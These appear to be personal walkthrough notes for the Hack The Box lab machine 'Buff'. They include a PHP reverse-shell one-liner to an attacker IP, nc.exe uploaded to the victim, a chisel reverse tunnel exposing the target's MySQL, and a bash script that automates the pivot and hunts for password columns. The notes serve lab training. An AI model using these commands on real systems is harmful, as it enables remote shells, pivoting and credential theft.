HTB buff notes

HTTP tips

  • when you see images, download them and analyze the metadata.

    • wget image_URL

    • exiftool image.img

    • check the modification time (and any author/software tags) – they can leak usernames or the tooling in use.

  • php reverse shell one-liner (attacker at 10.10.14.8, port 81 – start a listener first with nc -lvnp 81):

    php -r '$sock=fsockopen("10.10.14.8",81);exec("/bin/sh -i <&3 >&3 2>&3");'

PowerShell commands

Get-Content – prints the contents of a file (like cat)

tasklist – lists the running processes

Upload nc.exe to the victim, then from the victim:

nc.exe -zv localhost 8888

(-z is zero-I/O mode: it only checks whether something is listening on port 8888 of the target itself, without sending data; a "succeeded"/"open" result means the service is up but only bound to localhost)

using chisel to interact with SQL server on Windows target

https://github.com/jpillora/chisel/releases

  1. Download both the linux and windows amd64 .gz releases.

  2. gunzip both and rename the binaries to whatever you want.

  3. Transfer the Windows binary to the target machine.

  4. On Kali, chmod +x the linux binary and start it as a server (if it errors out, the port is already in use; pick another --port):

 ./chisel server --reverse --port 9002

  5. On Windows, connect back and reverse-forward the target's MySQL port to Kali:

.\chisel.exe client IP:9002 R:3306:localhost:3306

(R:3306:localhost:3306 means: listen on Kali's port 3306 and send whatever arrives there to localhost:3306 as seen from the Windows target)

Now that the tunnel is set up, the target's SQL server is reachable on Kali at localhost:3306.

On Kali,

nc localhost 3306

(a MySQL greeting/handshake packet coming back confirms the tunnel works)

You still need MySQL credentials before connecting.

MySQL password

Look in the web root's /include directory for config files containing credentials.

Log in to the SQL server (root with no password: just press Enter at the prompt):

mysql -u root -p -h 127.0.0.1

-> show databases;

-> use database_name;

-> show tables;

-> describe table_name;   # shows the columns

(you can confirm chisel bound the forwarded port on Kali with "ss -lnpt | grep 3306")
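The chisel pivot and the MySQL enumeration above, wrapped into one Kali-side script. This is an added example, not part of the original notes or of chisel. Assumed names: ./chisel_linux is the gunzipped Linux binary, chisel.exe the Windows one already on the target, 10.10.14.8 the attacker IP from the notes, and root with an empty password the credentials the notes describe. port_listening() takes the ss output as an argument so the "is the port bound?" check can be run on constructed text; the information_schema query goes beyond the notes' manual show/describe steps.

```shell
#!/usr/bin/env bash
# Added example (not from the original HTB Buff notes): automate the chisel
# reverse forward from Kali and enumerate the forwarded MySQL.
# Assumptions: ./chisel_linux (gunzipped Linux binary), chisel.exe already on
# the target, attacker IP 10.10.14.8 (from the notes), root / empty password.
set -u

ATTACKER_IP="10.10.14.8"   # tun0 address from the notes
CHISEL_PORT=9002           # chisel server port from the notes
FWD_PORT=3306              # target MySQL port, re-exposed on Kali's loopback

# port_listening PORT SS_OUTPUT: succeed if PORT is bound as a listening TCP
# socket in "ss -lnpt" output. Output is a parameter so the parser can be run
# offline on constructed text; live use is: port_listening 3306 "$(ss -lnpt)"
port_listening() {
    local port="$1" output="$2"
    printf '%s\n' "$output" | awk -v want=":$port" '
        $1 == "LISTEN" {
            n = split($4, a, ":")            # Local Address:Port, IPv4 or [::]
            if (":" a[n] == want) found = 1
        }
        END { exit found ? 0 : 1 }'
}

# The command the Windows side has to run (step 5 in the notes).
client_cmd() {
    printf '.\\chisel.exe client %s:%s R:%s:127.0.0.1:%s\n' \
        "$ATTACKER_IP" "$CHISEL_PORT" "$FWD_PORT" "$FWD_PORT"
}

# Start the chisel server, refusing if the port is already taken (the
# "if an error happens, the port is in use" case in the notes).
start_server() {
    if port_listening "$CHISEL_PORT" "$(ss -lnpt 2>/dev/null)"; then
        echo "port $CHISEL_PORT already in use; pick another with --port" >&2
        return 1
    fi
    ./chisel_linux server --reverse --port "$CHISEL_PORT" &
    CHISEL_PID=$!
    echo "chisel server pid $CHISEL_PID; now run on the target: $(client_cmd)"
}

# Poll until the reverse forward appears locally (i.e. the client connected).
wait_for_tunnel() {
    local tries=0
    until port_listening "$FWD_PORT" "$(ss -lnpt 2>/dev/null)"; do
        tries=$((tries + 1))
        [ "$tries" -ge 30 ] && return 1   # ~60 s, then give up
        sleep 2
    done
}

# Enumerate the forwarded MySQL: list databases, then every column whose name
# looks like a credential, via information_schema.
enum_mysql() {
    mysql -u root -h 127.0.0.1 -P "$FWD_PORT" \
        -e "SHOW DATABASES;
            SELECT table_schema, table_name, column_name
            FROM information_schema.columns
            WHERE column_name LIKE '%pass%' OR column_name LIKE '%pwd%'
               OR column_name LIKE '%secret%'
            ORDER BY table_schema, table_name;"
}

main() {
    start_server || exit 1
    wait_for_tunnel || { echo "no forward on $FWD_PORT after 60 s" >&2; exit 1; }
    enum_mysql
}

# Only run the pivot when invoked as: ./pivot.sh run
if [ "${1:-}" = "run" ]; then
    main
fi
```

Run it as ./pivot.sh run, paste the printed client command into the Windows shell, and the script waits until ss shows 3306 bound before querying. The R: forward uses 127.0.0.1 rather than localhost so the target can't resolve it to an IPv6 address that MySQL isn't bound to.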
